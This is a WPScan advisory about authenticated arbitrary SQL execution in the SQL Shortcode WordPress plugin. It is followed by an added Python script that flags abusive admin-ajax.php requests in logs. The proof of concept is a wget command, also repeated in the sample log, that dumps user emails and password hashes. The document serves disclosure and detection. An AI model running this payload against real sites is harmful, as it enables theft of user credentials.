SQL Shortcode <= 1.1 - Authenticated SQL Execution

Description
It's not actually an SQL injection; it's just executing SQL with an account as low-privileged as a subscriber. The plugin description says it all.

This great article (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) will help in understanding how to exploit shortcodes and why this works.

Vulnerabilities:

Execute whatever SQL you want to execute.

Found by:

Paul Dannewitz

Other vulnerabilities I submitted to wpvulndb: https://wpvulndb.com/search?utf8=%E2%9C%93&text=Paul+Dannewitz

Proof of Concept
wget --load-cookies cookie_file_with_cookies_of_just_a_subscriber_account.txt --post-data="action=parse-media-shortcode&shortcode=[sql]SELECT user_email, user_pass FROM wp_users[/sql]" wordpress.app/wp-admin/admin-ajax.php

Make sure the cookie file is in the right format (Netscape); a useful converter: http://crdx.org/misc/cookies/
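As an added detection example (not part of this advisory), the script below scans a request log for the exact pattern in the proof of concept: a request to admin-ajax.php with action=parse-media-shortcode whose shortcode parameter carries an [sql] tag. It assumes a JSON-lines log that records request bodies, as a WAF or reverse proxy might emit; the sample records and IP addresses are constructed.

```python
"""Flag admin-ajax.php requests that feed a [sql] shortcode to parse-media-shortcode."""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Opening [sql] tag, with or without attributes; matched case-insensitively so
# variants such as [SQL cache=0] are caught as well.
SQL_TAG = re.compile(r"\[\s*sql(?:\s[^\]]*)?\]", re.IGNORECASE)

# Constructed sample records (not real traffic): one JSON object per line with
# the request body as the server received it (form-encoded).
SAMPLE_LOG = """\
{"ip":"198.51.100.7","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=parse-media-shortcode&shortcode=%5Bsql%5DSELECT+user_email%2C+user_pass+FROM+wp_users%5B%2Fsql%5D"}
{"ip":"198.51.100.8","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=parse-media-shortcode&shortcode=%5Bgallery+ids%3D%221%2C2%22%5D"}
{"ip":"198.51.100.9","method":"POST","uri":"/wp-admin/admin-ajax.php?action=parse-media-shortcode","body":"shortcode=%5BSQL%20cache%3D0%5DSELECT%201%5B%2FSQL%5D"}
{"ip":"198.51.100.10","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=heartbeat&data=x"}
"""

def parse_params(record):
    """Merge query-string and body parameters (action may travel in either)."""
    params = {}
    query = urlsplit(record.get("uri", "")).query
    for source in (query, record.get("body", "")):
        for key, values in parse_qs(source, keep_blank_values=True).items():
            params.setdefault(key, values[0])
    return params

def is_sql_shortcode_abuse(record):
    """True when the request renders a [sql] shortcode via parse-media-shortcode."""
    if not record.get("uri", "").split("?")[0].endswith("/wp-admin/admin-ajax.php"):
        return False
    params = parse_params(record)
    return (params.get("action") == "parse-media-shortcode"
            and bool(SQL_TAG.search(params.get("shortcode", ""))))

def scan(log_text):
    """Return (ip, decoded shortcode) for every flagged request in a JSON-lines log."""
    hits = []
    for line in filter(None, log_text.splitlines()):
        record = json.loads(line)
        if is_sql_shortcode_abuse(record):
            hits.append((record["ip"], parse_params(record)["shortcode"]))
    return hits

if __name__ == "__main__":
    for ip, shortcode in scan(SAMPLE_LOG):
        print(f"{ip}: {shortcode}")
```

Any hit from a session that is not an administrator's is worth treating as an incident, since the endpoint itself requires only a logged-in user.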

Affects Plugin

References

URL https://wordpress.org/plugins/sql-shortcode/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Paul Dannewitz
Submitter Twitter padannewitz
Verified No
WPVDB ID 8904

Timeline

Publicly Published 2017-09-02
Added 2017-09-20
Last Updated 2017-09-20

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.